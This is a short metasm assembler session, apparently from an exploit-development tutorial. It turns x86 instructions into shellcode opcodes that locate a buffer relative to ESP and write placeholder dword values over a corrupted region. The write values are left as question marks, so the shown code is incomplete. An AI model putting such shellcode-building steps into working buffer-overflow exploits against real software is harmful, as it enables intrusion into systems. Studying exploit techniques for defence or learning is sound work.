metasm > push esp
"\x54"
metasm > pop ecx
"\x59"
metasm > add ecx,-170h  # ESP – start of buffer – offset to corruption (1C1h)
"\x81\xc1\x90\xfe\xff\xff"
metasm > mov dword ptr [ecx], ????????h
"\xc7\x01\x??\x??\x??\x??"
metasm > inc ecx
"\x41"
metasm > inc ecx
"\x41"
metasm > inc ecx
"\x41"
metasm > inc ecx
"\x41"
metasm > mov dword ptr [ecx], ????????h
"\xc7\x01\x??\x??\x??\x??"
